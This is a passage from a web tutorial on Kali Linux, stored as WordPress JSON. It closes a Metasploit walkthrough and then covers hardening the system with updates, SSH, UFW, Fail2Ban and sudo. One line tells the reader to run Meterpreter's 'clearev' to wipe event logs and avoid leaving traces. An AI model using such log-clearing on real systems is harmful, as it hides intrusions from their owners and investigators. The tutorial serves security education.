12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\"><\/path>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure><\/div><p>When you&rsquo;re done, remember to clean up to avoid leaving traces:<\/p><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">clearev<\/pre><p>Then, exit the Meterpreter session with:<\/p><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">exit<\/pre><h2 class=\"wp-block-heading\" id=\"h-securing-kali-linux\">Securing Kali Linux<\/h2><p>Using Kali Linux for security tasks means you must prioritize securing your own system because a compromised system could expose sensitive data, disrupt your work, or even be used to launch attacks against others.<\/p><p>Kali Linux follows standard <a href=\"\/in\/tutorials\/vps-security\">Linux VPS security best practices<\/a>, such as:<\/p><p><strong>Update regularly<\/strong><\/p><p><a href=\"\/in\/tutorials\/how-to-update-kali-linux\">Keeping Kali Linux updated<\/a> is one of the most effective ways to secure it:<\/p><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">sudo apt update &amp;&amp; sudo apt -y upgrade<\/pre><p>This ensures you have the latest security patches for Kali Linux and all installed tools.<\/p><p><strong>Disable root login<\/strong><\/p><p>Logging in as root over SSH is risky. Instead, create a separate user with sudo privileges:<\/p><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">sudo adduser &lt;new_user&gt;\n\nsudo usermod -aG sudo &lt;new_user&gt;<\/pre><p>Next, edit the SSH configuration file:<\/p><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">sudo nano \/etc\/ssh\/sshd_config<\/pre><p>Find the line <strong>PermitRootLogin<\/strong> and set it to <strong>no<\/strong> to disable direct root access via SSH. Save the file, then restart the SSH service:<\/p><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">sudo systemctl restart ssh<\/pre><p><strong>Use a Firewall<\/strong><\/p><p>A firewall limits access to your VPS and blocks unwanted traffic. Like other distributions, Kali Linux supports <a href=\"\/in\/tutorials\/how-to-configure-firewall-on-ubuntu-using-ufw\">Uncomplicated Firewall (UFW)<\/a> that is simple to configure.<\/p><p>Install and enable UFW:<\/p><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">sudo apt install ufw\n\nsudo ufw enable<\/pre><p>Allow only essential services, such as SSH, on your custom port:<\/p><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">sudo ufw allow 2222\/tcp<\/pre><p>You can adjust the rules based on other services you plan to run. Once done, check the firewall status:<\/p><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">sudo ufw status<\/pre><p><strong>Install Fail2Ban<\/strong><\/p><p><a href=\"\/in\/tutorials\/fail2ban-configuration\">Fail2Ban<\/a> monitors logs and automatically blocks IP addresses with suspicious activity, such as repeated failed login attempts. Install it with:<\/p><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">sudo apt install fail2ban<\/pre><p>Fail2Ban is configured to protect SSH by default, but you can adjust its settings in <strong>\/etc\/fail2ban\/jail.conf<\/strong> to monitor other services. Restart Fail2Ban after making changes:<\/p><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">sudo systemctl restart fail2ban<\/pre><p><strong>Limit sudo permissions<\/strong><\/p><p>For any additional users you add, restrict their sudo privileges to only the necessary commands. Use the<a href=\"\/in\/tutorials\/sudo-and-the-sudoers-file\"> visudo command<\/a> to configure sudo permissions carefully:<\/p><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">sudo visudo<\/pre><p>This lets you specify strictly which commands each user can run with sudo.<\/p><h2 class=\"wp-block-heading\" id=\"h-conclusion\">Conclusion<\/h2><p>In this tutorial, we&rsquo;ve covered the fundamentals of using Kali Linux for security purposes. We&rsquo;ve described how to access your Kali Linux environment, run essential commands, manage specialized tools, and perform assessments using Nmap, Hydra, and Metasploit.<\/p><p>We also highlighted the importance of securing your own Kali Linux system by updating regularly, disabling root login, and configuring tools like a firewall and Fail2Ban.<\/p><p>Kali Linux has hundreds of tools for penetration testing, vulnerability assessment, and network discovery. Keep exploring its capabilities to deepen your cybersecurity skills. If you have questions or want to share your experience with Kali Linux, feel free to use the comment box below.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>As a security-focused operating system, Kali Linux lets you perform various tasks, such as penetration testing, digital forensics, and network analysis. With hundreds of security tools, Kali Linux is ideal for cybersecurity specialists and enthusiasts looking to expand their skills. If you&rsquo;re interested in using Kali Linux but unsure where to start, you&rsquo;re in the [&#8230;]<\/p>\n<p><a class=\"btn btn-secondary understrap-read-more-link\" href=\"\/in\/tutorials\/kali-linux-tutorial\">Read More&#8230;<\/a><\/p>\n","protected":false},"author":411,"featured_media":129402,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"rank_math_title":"Kali Linux tutorial: Manage tools and run security tests","rank_math_description":"Learn how to use Kali Linux, from accessing your environment to managing tools, performing security tests, and protecting your system.","rank_math_focus_keyword":"kali linux tutorial","footnotes":""},"categories":[22640],"tags":[],"class_list":["post-119150","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-vps"],"hreflangs":[{"locale":"en-US","link":"https:\/\/www.hostinger.com\/tutorials\/kali-linux-tutorial","default":0},{"locale":"fr-FR","link":"https:\/\/www.hostinger.com\/fr\/tutoriels\/tutoriel-kali-linux","default":0},{"locale":"es-ES","link":"https:\/\/www.hostinger.com\/es\/tutoriales\/tutorial-kali-linux","default":0},{"locale":"en-UK","link":"https:\/\/www.hostinger.com\/uk\/tutorials\/kali-linux-tutorial","default":0},{"locale":"en-MY","link":"https:\/\/www.hostinger.com\/my\/tutorials\/how-to-set-up-shipping-in-woocommerce-14","default":0},{"locale":"en-PH","link":"https:\/\/www.hostinger.com\/ph\/tutorials\/kali-linux-tutorial","default":0},{"locale":"en-IN","link":"https:\/\/www.hostinger.com\/in\/tutorials\/kali-linux-tutorial","default":0},{"locale":"en-CA","link":"https:\/\/www.hostinger.com\/ca\/tutorials\/kali-linux-tutorial","default":0},{"locale":"es-AR","link":"https:\/\/www.hostinger.com\/ar\/tutoriales\/tutorial-kali-linux","default":0},{"locale":"es-MX","link":"https:\/\/www.hostinger.com\/mx\/tutoriales\/tutorial-kali-linux","default":0},{"locale":"es-CO","link":"https:\/\/www.hostinger.com\/co\/tutoriales\/tutorial-kali-linux","default":0},{"locale":"en-AU","link":"https:\/\/www.hostinger.com\/au\/tutorials\/kali-linux-tutorial","default":0},{"locale":"en-NG","link":"https:\/\/www.hostinger.com\/ng\/tutorials\/kali-linux-tutorial","default":0}],"_links":{"self":[{"href":"https:\/\/www.hostinger.com\/in\/tutorials\/wp-json\/wp\/v2\/posts\/119150","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.hostinger.com\/in\/tutorials\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.hostinger.com\/in\/tutorials\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.hostinger.com\/in\/tutorials\/wp-json\/wp\/v2\/users\/411"}],"replies":[{"embeddable":true,"href":"https:\/\/www.hostinger.com\/in\/tutorials\/wp-json\/wp\/v2\/comments?post=119150"}],"version-history":[{"count":12,"href":"https:\/\/www.hostinger.com\/in\/tutorials\/wp-json\/wp\/v2\/posts\/119150\/revisions"}],"predecessor-version":[{"id":129400,"href":"https:\/\/www.hostinger.com\/in\/tutorials\/wp-json\/wp\/v2\/posts\/119150\/revisions\/129400"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.hostinger.com\/in\/tutorials\/wp-json\/wp\/v2\/media\/129402"}],"wp:attachment":[{"href":"https:\/\/www.hostinger.com\/in\/tutorials\/wp-json\/wp\/v2\/media?parent=119150"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.hostinger.com\/in\/tutorials\/wp-json\/wp\/v2\/categories?post=119150"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.hostinger.com\/in\/tutorials\/wp-json\/wp\/v2\/tags?post=119150"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}